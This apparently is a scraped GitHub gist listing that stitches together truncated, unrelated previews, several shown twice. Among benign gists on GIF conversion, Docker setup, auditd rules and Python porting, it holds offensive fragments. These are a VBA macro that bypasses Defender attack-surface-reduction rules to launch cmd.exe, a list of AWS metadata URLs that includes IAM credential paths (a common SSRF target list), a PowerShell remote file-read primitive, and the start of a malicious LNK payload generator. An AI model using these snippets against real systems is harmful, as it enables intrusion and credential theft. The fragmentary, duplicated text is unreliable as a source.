Emilio epinna

## ASR Rules Bypass.vba
' ASR rules bypass creating child processes
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule

Sub ASR_blocked()
    Dim WSHShell As Object
    Set WSHShell = CreateObject("Wscript.Shell")
    WSHShell.Run "cmd.exe"
End Sub

## gif-from-tweet.md

      
              1 file
            
          
              18 forks
            
          
              14 comments
            
          
              174 stars
            
          
                brianloveswords
                / gif-from-tweet.md
            
            
              Last active
              December 1, 2023 14:58
            
          
    gif-from-tweet

There are so many great GIFs out there and I want to have copies of them. Twitter makes that harder than it should be by converting them to MP4 and not providing access to the source material. To make it easier, I made a bash pipeline that takes a tweet URL and a filename, extracts the MP4 from that tweet and uses ffmpeg to convert back to GIF.
Dependencies


ffmpeg

macOS: brew install ffmpeg
Ubuntu/Debian: apt install ffmpeg


## cloud_metadata.txt
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories

http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

## Plex, usenet and torrent docker-compose file
# to run: docker-compose run
#
# Create a .evn file in the same folder as this file and change the variables.
# MOUNT_POINT=/tmp/
# VPN_PROVIDER=changeme
# VPN_CONFIG=changeme
# VPN_USERNAME=changeme
# VPN_PASSWORD=changeme
#
#

## audit.rules
# IMPORTANT!
# This gist has been transformed into a github repo
# You can find the most recent version there:
# https://github.com/Neo23x0/auditd

#      ___             ___ __      __
#     /   | __  ______/ (_) /_____/ /
#    / /| |/ / / / __  / / __/ __  /
#   / ___ / /_/ / /_/ / / /_/ /_/ /
#  /_/  |_\__,_/\__,_/_/\__/\__,_/

## source-code-review-atom.md

      
              1 file
            
          
              0 forks
            
          
              1 comment
            
          
              2 stars
            
          
                andresriancho
                / source-code-review-atom.md
            
            
              Last active
              July 23, 2018 21:44
            
              
                Ideas for source code review plugin for Atom
              
          
    User story

As an application security expert I use Atom to read source code. I would like to be able to have a plugin with features
that will help me identify vulnerabilities.
Ideas


Add annotations to the source code: Select a few lines of code, right click, "Add annotation",
text box appears, user types comments on the source code, clicks "Save". All annotations can be seen in a tab.
If the code has annotations then it is highlighted differently (change background color)


The plugin implements methods for searching for XSS, SQL injection, etc. The plugin adds a menu


## FileReadPrimitive.ps1
$CimSession = New-CimSession -ComputerName 10.0.0.2

$FilePath = 'C:\Windows\System32\notepad.exe'

# PS_ModuleFile only implements GetInstance (versus EnumerateInstance) so this trick below will force a "Get" operation versus the default "Enumerate" operation.
$PSModuleFileClass = Get-CimClass -Namespace ROOT/Microsoft/Windows/Powershellv3 -ClassName PS_ModuleFile -CimSession $CimSession
$InMemoryModuleFileInstance = New-CimInstance -CimClass $PSModuleFileClass -Property @{ InstanceID= $FilePath } -ClientOnly
$FileContents = Get-CimInstance -InputObject $InMemoryModuleFileInstance -CimSession $CimSession
$FileLengthBytes = $FileContents.FileData[0..3]
[Array]::Reverse($FileLengthBytes)

## README.md

      
              2 files
            
          
              0 forks
            
          
              0 comments
            
          
              1 star
            
          
                cyrus-and
                / README.md
            
            
              Last active
              July 15, 2017 19:53
            
          
    $ ./hashall.py asd
BLAKE2s256  256  2521f2bce24415ca048d86e965b49e9c0695547dffe6b441cc48cfb0043e6157
blake2b512  512  e4139471a1800a05b5e02b56669f025d01e33c5655153a4faa29f694f7849c63f97577fcc3e397d1138cf4640e0c2053e74a7af646598310d076dc6f15d1af50
SHA256      256  688787d8ff144c502c7f5cffaafe2cc588d86079f9de88304c26b0cb99ce91c6
SHA512      512  e54ee7e285fbb0275279143abc4c554e5314e7b417ecac83a5984a964facbaad68866a2841c3e83ddf125a2985566261c4014f9f960ec60253aebcda9513a9b4
blake2s256  256  2521f2bce24415ca048d86e965b49e9c0695547dffe6b441cc48cfb0043e6157
MD4         128  61118995d26bef582a59dec9220483e8
sha256      256  688787d8ff144c502c7f5cffaafe2cc588d86079f9de88304c26b0cb99ce91c6
sha512      512  e54ee7e285fbb0275279143abc4c554e5314e7b417ecac83a5984a964facbaad68866a2841c3e83ddf125a2985566261c4014f9f960ec60253aebcda9513a9b4


## Create-LNK.ps1
function Create-LNKPayload{
<#
    .SYNOPSIS

        Generates a malicous LNK file

    .PARAMETER LNKName

        Name of the LNK file you want to create.

## python3kflag.md

      
              1 file
            
          
              3 forks
            
          
              1 comment
            
          
              7 stars
            
          
                rowillia
                / python3kflag.md
            
            
              Last active
              December 7, 2016 21:45
            
              
                The Magic of the -3 Flag in Python 2
              
          
    The Magic of the -3 Flag in Python 2

Porting code from Python 2 to Python 3 can be a daunting task.  Tools like Futureize or Modernize can do most of the mechanical work for you, and Pylint can find obvious problems with code that's meant to be 2and3 compatible.  You should absolutely be using these tools as they identify the lion's share of compatibility problems.  Thanks to this work, it's really never been easier to port a large codebase to Python 3.
Even with these tools, however, porting code in a way that ensures identical behavior in Python 2 and Python 3 is tough. Python is a highly dynamic language and there is a huge breadth of changes between Python 2 and Python 3. Also, while we'd all love to work in code bases with 100% unit test coverage, the reality is unfortunately often very different. Given this, it's hard if not impossible for a static analysis tool t
	' ASR rules bypass creating child processes
	' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
	' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
	' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule

	Sub ASR_blocked()
	Dim WSHShell As Object
	Set WSHShell = CreateObject("Wscript.Shell")
	WSHShell.Run "cmd.exe"
	End Sub
	## AWS
	# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories

	http://169.254.169.254/latest/user-data
	http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
	http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
	http://169.254.169.254/latest/meta-data/ami-id
	http://169.254.169.254/latest/meta-data/reservation-id
	http://169.254.169.254/latest/meta-data/hostname
	http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
	# to run: docker-compose run
	#
	# Create a .evn file in the same folder as this file and change the variables.
	# MOUNT_POINT=/tmp/
	# VPN_PROVIDER=changeme
	# VPN_CONFIG=changeme
	# VPN_USERNAME=changeme
	# VPN_PASSWORD=changeme
	#
	#
	# IMPORTANT!
	# This gist has been transformed into a github repo
	# You can find the most recent version there:
	# https://github.com/Neo23x0/auditd

	# ___ ___ __ __
	# / \| __ ______/ (_) /_____/ /
	# / /\| \|/ / / / __ / / __/ __ /
	# / ___ / /_/ / /_/ / / /_/ /_/ /
	# /_/ \|_\__,_/\__,_/_/\__/\__,_/
	$CimSession = New-CimSession -ComputerName 10.0.0.2

	$FilePath = 'C:\Windows\System32\notepad.exe'

	# PS_ModuleFile only implements GetInstance (versus EnumerateInstance) so this trick below will force a "Get" operation versus the default "Enumerate" operation.
	$PSModuleFileClass = Get-CimClass -Namespace ROOT/Microsoft/Windows/Powershellv3 -ClassName PS_ModuleFile -CimSession $CimSession
	$InMemoryModuleFileInstance = New-CimInstance -CimClass $PSModuleFileClass -Property @{ InstanceID= $FilePath } -ClientOnly
	$FileContents = Get-CimInstance -InputObject $InMemoryModuleFileInstance -CimSession $CimSession
	$FileLengthBytes = $FileContents.FileData[0..3]
	[Array]::Reverse($FileLengthBytes)
	function Create-LNKPayload{
	<#
	.SYNOPSIS

	Generates a malicous LNK file

	.PARAMETER LNKName

	Name of the LNK file you want to create.